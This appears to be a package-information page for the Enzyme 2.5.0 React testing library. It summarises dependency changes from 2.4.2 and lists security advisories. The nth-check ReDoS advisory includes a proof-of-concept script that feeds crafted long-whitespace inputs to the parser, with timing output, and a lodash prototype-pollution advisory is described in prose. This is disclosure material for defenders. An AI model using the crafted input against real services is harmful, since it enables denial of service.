Enzyme version 2.5.0 introduces notable updates and refinements compared to its predecessor, version 2.4.2, enhancing the developer experience for React testing. A key difference lies in the dependencies. Version 2.5.0 upgrades cheerio to ^0.22.0 while 2.4.2 uses ^0.20.0. The newer version drops the dependency on function.prototype.name, in-publish, and object.entries, and introduces object.values as a dependency. These modifications might reflect internal code optimizations and API improvements, potentially leading to more efficient and streamlined testing workflows.
Furthermore, the development dependencies see significant shifts, with upgrades across Babel-related packages (babel-cli, babel-core, babel-eslint, babel-loader, babel-preset-airbnb, babel-register), ESLint and its plugins (eslint, eslint-config-airbnb, eslint-plugin-import, eslint-plugin-jsx-a11y, eslint-plugin-react), and other tools like karma, mocha, sinon and webpack. This suggests an effort to modernize the development environment and incorporate the latest linting, testing, and build practices. Developers upgrading to version 2.5.0 benefit from these updated tools, which can lead to better code quality, improved test coverage, and a smoother integration with modern JavaScript workflows.
The peer dependency declaration for React remains similar but version 2.5.0 explicitly declares support for React 15.x. These changes collectively contribute to a more robust, up-to-date, and developer-friendly testing experience with Enzyme.
All the vulnerabilities related to the version 2.5.0 of the package
Inefficient Regular Expression Complexity in nth-check
There is a Regular Expression Denial of Service (ReDoS) vulnerability in nth-check that causes a denial of service when parsing crafted invalid CSS nth-checks.
The ReDoS vulnerabilities of the regex are mainly due to the sub-pattern \s*(?:([+-]?)\s*(\d+))? with quantified overlapping adjacency and can be exploited with the following code.
Proof of Concept
// PoC.js
var nthCheck = require("nth-check")
for(var i = 1; i <= 50000; i++) {
var time = Date.now();
var attack_str = '2n' + ' '.repeat(i*10000)+"!";
try {
nthCheck.parse(attack_str)
}
catch(err) {
var time_cost = Date.now() - time;
console.log("attack_str.length: " + attack_str.length + ": " + time_cost+" ms")
}
}
The Output
attack_str.length: 10003: 174 ms
attack_str.length: 20003: 1427 ms
attack_str.length: 30003: 2602 ms
attack_str.length: 40003: 4378 ms
attack_str.length: 50003: 7473 ms
Prototype Pollution in lodash
Versions of lodash prior to 4.17.19 are vulnerable to Prototype Pollution. The functions pick, set, setWith, update, updateWith, and zipObjectDeep allow a malicious user to modify the prototype of Object if the property identifiers are user-supplied. Being affected by this issue requires manipulating objects based on user-provided property values or arrays.
This vulnerability causes the addition or modification of an existing property that will exist on all objects and may lead to Denial of Service or Code Execution under specific circumstances.